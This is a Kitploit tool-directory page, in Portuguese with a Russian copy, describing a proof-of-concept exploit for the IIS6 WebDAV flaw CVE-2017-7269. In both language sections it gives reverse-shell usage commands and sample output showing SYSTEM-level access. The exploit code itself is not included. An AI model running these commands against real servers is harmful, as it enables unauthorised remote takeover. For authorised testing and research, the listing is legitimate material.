Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2017-7269 — é uma ferramenta de PoC que demonstra um exploit para uma vulnerabilidade conhecida no componente WebDAV do IIS6 | Kitploit
Ferramentas/GitHubGitHub/geniuszly/cve-2017-7269
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubgeniuszly/cve-2017-7269

CVE-2017-7269

é uma ferramenta de PoC que demonstra um exploit para uma vulnerabilidade conhecida no componente WebDAV do IIS6

Ver Repositório
421há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

PT

GenWebDavIISExploit é uma ferramenta PoC que demonstra um exploit para uma vulnerabilidade conhecida no componente WebDAV do IIS6. Esta ferramenta foi projetada para fins educacionais e de pesquisa, a fim de mostrar como a vulnerabilidade pode ser explorada para executar código arbitrário em um servidor remoto.

Aviso Legal

Este projeto é destinado apenas para fins educacionais. Use esta ferramenta de forma responsável e somente em sistemas que você possui ou tem permissão explícita para testar. O acesso não autorizado a sistemas de computador é ilegal.

Características

  • Execução remota de código em servidores IIS6 WebDAV vulneráveis.
  • Geração dinâmica de payload com IP e porta reversos especificados pelo usuário.
  • Interface de linha de comando fácil de usar para exploração rápida.

Pré-requisitos

  • Python 3.x: Certifique-se de que o Python 3 está instalado no seu sistema.
  • Acesso à Rede: Capacidade de se conectar ao IP e porta da máquina alvo.

Uso

Argumentos da Linha de Comando

  • IP Alvo: O endereço IP do servidor IIS6 WebDAV alvo.
  • Porta Alvo: O número da porta na qual o serviço WebDAV está rodando (geralmente 80).
  • IP Reverso: Seu endereço IP para o qual o shell reverso deve se conectar.
  • Porta Reversa: O número da porta no seu sistema para receber o shell reverso.
  • Exemplo

    root@kitploit:~
    python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
    

    Exemplo de Uso

    root@kitploit:~
    python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
    

    Exemplo de Saída

    root@kitploit:~
    $ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
    
    [*] Подключение к цели 192.168.1.10 на порту 80...
    [*] Отправка специально сформированного HTTP-запроса для эксплуатации уязвимости...
    [*] Длина полезной нагрузки: 1744 байт
    [*] Ожидание обратного соединения...
    
    [+] Ответ от цели:
    HTTP/1.1 200 OK
    Content-Length: 123
    Server: Microsoft-IIS/6.0
    
    [+] Получено обратное соединение от 192.168.1.10:12345
    [+] Удаленный доступ успешно установлен!
    
    C:\Windows\system32> whoami
    nt authority\system
    
    C:\Windows\system32> ipconfig
    Настройка IP Windows
    
       Адаптер Ethernet Local Area Connection:
          DNS-суффикс подключения . . . . . : example.local
          IPv4-адрес. . . . . . . . . . . . : 192.168.1.10
          Маска подсети . . . . . . . . . . : 255.255.255.0
          Основной шлюз . . . . . . . . . . : 192.168.1.1
        
    

    Notas

    • Certifique-se de ter um listener rodando na porta reversa especificada para capturar o shell reverso recebido.
    • Use esta ferramenta apenas em sistemas autorizados para testar vulnerabilidades.

    RU

    GenWebDavIISExploit - это PoC-инструмент, демонстрирующий эксплуатацию известной уязвимости в компоненте WebDAV на IIS6. Этот инструмент создан в образовательных и исследовательских целях, чтобы показать, как уязвимость может быть использована для выполнения произвольного кода на удаленном сервере.

    Отказ от ответственности

    Этот проект предназначен только для образовательных целей. Используйте этот инструмент ответственно и только на системах, которые вы владеете или имеете явное разрешение для тестирования. Несанкционированный доступ к компьютерным системам является незаконным.

    Особенности

    • Выполнение удаленного кода на уязвимых серверах IIS6 WebDAV.
    • Генерация динамического полезного кода с указанием IP и порта для обратного соединения.
    • Простой интерфейс командной строки для быстрого использования.

    Требования

    • Python 3.x: Убедитесь, что у вас установлен Python 3.
    • Доступ к сети: Возможность подключаться к IP-адресу и порту целевой машины.

    Использование

    Аргументы командной строки

    • Target IP: IP-адрес целевого сервера IIS6 WebDAV.
    • Target Port: Номер порта, на котором работает служба WebDAV (обычно 80).
    • Reverse IP: Ваш IP-адрес, на который должно быть установлено обратное соединение.
    • Reverse Port: Номер порта на вашей системе для получения обратного соединения.

    Пример

    root@kitploit:~
    python3 GenWebDavIISExploit.py <target_ip> <target_port> <reverse_ip> <reverse_port>
    

    Пример использования

    root@kitploit:~
    python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
    

    Пример вывода

    root@kitploit:~
    $ python3 GenWebDavIISExploit.py 192.168.1.10 80 192.168.1.5 4444
    
    [*] Подключение к цели 192.168.1.10 на порту 80...
    [*] Отправка специально сформированного HTTP-запроса для эксплуатации уязвимости...
    [*] Длина полезной нагрузки: 1744 байт
    [*] Ожидание обратного соединения...
    
    [+] Ответ от цели:
    HTTP/1.1 200 OK
    Content-Length: 123
    Server: Microsoft-IIS/6.0
    
    [+] Получено обратное соединение от 192.168.1.10:12345
    [+] Удаленный доступ успешно установлен!
    
    C:\Windows\system32> whoami
    nt authority\system
    
    C:\Windows\system32> ipconfig
    Настройка IP Windows
    
       Адаптер Ethernet Local Area Connection:
          DNS-суффикс подключения . . . . . : example.local
          IPv4-адрес. . . . . . . . . . . . : 192.168.1.10
          Маска подсети . . . . . . . . . . : 255.255.255.0
          Основной шлюз . . . . . . . . . . : 192.168.1.1
        
    

    Заметки

    • Убедитесь, что у вас запущен прослушиватель на указанном обратном порту для перехвата входящего обратного соединения.
    • Используйте этот инструмент только на авторизованных системах для проверки на наличие уязвимостей.
    Baixar ferramenta